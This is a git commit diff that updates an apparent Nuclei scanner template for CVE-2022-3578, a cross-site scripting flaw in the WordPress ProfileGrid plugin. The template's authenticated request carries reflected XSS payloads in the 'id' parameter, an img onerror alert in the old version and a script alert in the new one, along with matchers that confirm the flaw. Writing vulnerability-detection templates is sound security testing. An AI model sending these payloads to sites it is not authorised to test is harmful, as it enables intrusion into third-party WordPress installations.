Update CVE-2022-3578.yaml

patch-1
Ritik Chaddha 2022-11-16 15:01:54 +05:30 committed by GitHub
parent 9b3a991777
commit 57f00c877d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 18 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2022-3578 id: CVE-2022-3578
info: info:
name: ProfileGrid < 5.1.1 - Reflected Cross-Site Scripting name: ProfileGrid < 5.1.1 - Cross-Site Scripting
author: theamanrawat author: theamanrawat
severity: medium severity: medium
description: | description: |
@ -12,7 +12,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2022-3578 - https://nvd.nist.gov/vuln/detail/CVE-2022-3578
metadata: metadata:
verified: true verified: true
tags: cve,cve2022,wp-plugin,wp,xss,authenticated,wpscan,wordpress,profilegrid-user-profiles-groups-and-communities tags: cve,cve2022,wp-plugin,wp,wordpress,xss,profilegrid,authenticated
requests: requests:
- raw: - raw:
@ -24,25 +24,16 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In log={{username}}&pwd={{password}}&wp-submit=Log+In
- | - |
GET /wp-admin/admin.php?page=pm_add_group&id="><img+src+onerror%3Dalert(document.domain)> HTTP/1.1 GET /wp-admin/admin.php?page=pm_add_group&id="><script>alert%28document.domain%29<%2Fscript> HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
req-condition: true req-condition: true
cookie-reuse: true cookie-reuse: true
matchers-condition: and
matchers: matchers:
- type: word - type: dsl
part: body_2 dsl:
words: - 'contains(all_headers_2, "text/html")'
- '<img src onerror=alert(document.domain)>' - 'status_code_2 == 200'
- 'Extension Options' - 'contains(body_2, "Extension Options")'
- 'contains(body_2, "<script>alert(document.domain)</script>&tab")'
condition: and condition: and
- type: word
part: header_2
words:
- text/html
- type: status
status:
- 200